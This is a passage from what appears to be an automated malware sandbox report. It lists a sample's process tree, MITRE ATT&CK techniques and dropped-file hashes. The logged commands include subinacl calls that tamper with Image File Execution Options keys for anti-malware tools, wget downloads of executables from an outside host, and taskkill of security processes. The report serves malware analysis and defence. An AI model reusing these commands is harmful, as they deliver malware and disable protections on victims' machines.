    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVRT.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:4172
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lamescan3.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:776
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lass.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:1500
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\launcher_service.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3688
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LoadStat.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3180
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:2652
- - C:\Windows\subinacl.exe
    subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LP.exe" /grant=S-1-5-32-545=R /grant=S-1-5-32-544=R /grant=S-1-1-0=R /grant=S-1-5-32-578=R /grant=S-1-5-18=R /setowner=S-1-5-32-546 /revoke=S-1-3-0
    3⤵
    PID:3740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dedka.bat" "
  2⤵
  PID:1236
- - C:\Users\Admin\AppData\Local\Temp\wget.exe
    wget -i dedka.txt --continue --no-check-certificate
    3⤵
    - Executes dropped EXE
    PID:4952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" ver"
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\find.exe
    find "5.1"
    3⤵
    PID:3172
- - C:\Users\Admin\AppData\Local\Temp\wget.exe
    wget -c http://druzim.freewww.biz/procx64.exe
    3⤵
    - Executes dropped EXE
    PID:2728
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:456
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Windows\SysWOW64\find.exe
    find "ProcessHacker.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4992
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3452
- - C:\Windows\SysWOW64\find.exe
    find "romadachashin.exe"
    3⤵
    PID:3492
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2656
- - C:\Windows\SysWOW64\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:4044
- - C:\Windows\SysWOW64\find.exe
    find "miter.exe"
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im alark.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4592
- - C:\Users\Admin\AppData\Local\Temp\wget.exe
    wget -c http://druzim.freewww.biz/clr.exe
    3⤵
    - Executes dropped EXE
    PID:3376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Time Discovery

T1124

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dedka.bat

Filesize
794B

MD5
4fbac65ee7a9978c9b8feb9deafb59d5

SHA1
611308168c96f50d3983934363f4a8fb0aeeaa81

SHA256
2944c71c1026c823b07c756a300778ce0e54b51dd8df73279e4c2a2a3db94b21

SHA512
99155434654034175ed9919a5d0af845e1847a01c1bcd2afdc1b69cd418c8b601dee5901b3bcc18fe74e5f8647a97f86e1f4172f0e97513f67f64057dc5c819d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dedka.txt

Filesize
430B

MD5
c4cfffb8a5e92dc5fefef845afa8f3a8

SHA1
ecd2511138941b01988d7f67e5e0a44c5bdf02c7

SHA256
9eeeef33da9b085a08b86bed4dcf4fd6f4a4fb855f221205a5b2d5eb6eed43b6

SHA512
1108074ea7f4164522e91c1883a2c998d8d84d57256e83216ace888a13addab18909af05011199786343e08ddd6dbfc705f211fb1de82fd8464c0252d5c83aa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\rer.bat

Filesize
323KB

MD5
1052148c6aa24245d31ed2f1030025bc

SHA1
2bea7271c7e64f2a947d2cbaf296defdf0806921

SHA256
468f4dfaa21596f8624c5e76d9f2b9eb55fc2cb88051affde7b704bd4ae0f56d

SHA512
3391fb1befc9c4c986cdc2d8740890e5056271726f51831b47b77cda0772878ac0521b9b7c3a6c5f779b2d97941b2bb7a9c3963a551a4460ec66a8a22931e86a

Download Submit
C:\Users\Admin\AppData\Local\Temp\subinacl.exe

Filesize
283KB

MD5
53cdbb093b0aee9fd6cf1cbd25a95077

SHA1
3b90ecc7b40c9c74fd645e9e24ab1d6d8aee6c2d

SHA256
01a2e49f9eed2367545966a0dc0f1d466ff32bd0f2844864ce356b518c49085c

SHA512
7335474d6a4b131576f62726c14148acf666e9a2ce54128b23fe04e78d366aa5bdf428fe68f28a42c2b08598d46cada447a4e67d530529b3e10f4282513a425f

Download Submit
C:\Users\Admin\AppData\Local\Temp\wget.exe

Filesize
732KB

MD5
a9ff569c7cc92998180b0a5f9acac852

SHA1
031e0698d1bfbb2373e55f804bdb9fa02bce9872

SHA256
6791fe27be23e8431c77ac4f00ce40daf385faf9d0abee9eadc83df434881f1e

SHA512
d7c0ec1c274a6b36790042e4ec830994fe546b0e77e45a050d5eb5e029ab460490dbefb7d219deb69b0b4ae9706f32e4796589bbc0ef31eff7d60328ae371ebf

Download Submit
memory/2728-25-0x0000000000400000-0x00000000004C3000-memory.dmp

Filesize
780KB

Download
memory/3376-27-0x0000000000400000-0x00000000004C3000-memory.dmp

Filesize
780KB

Download
memory/4952-22-0x0000000000400000-0x00000000004C3000-memory.dmp

Filesize
780KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads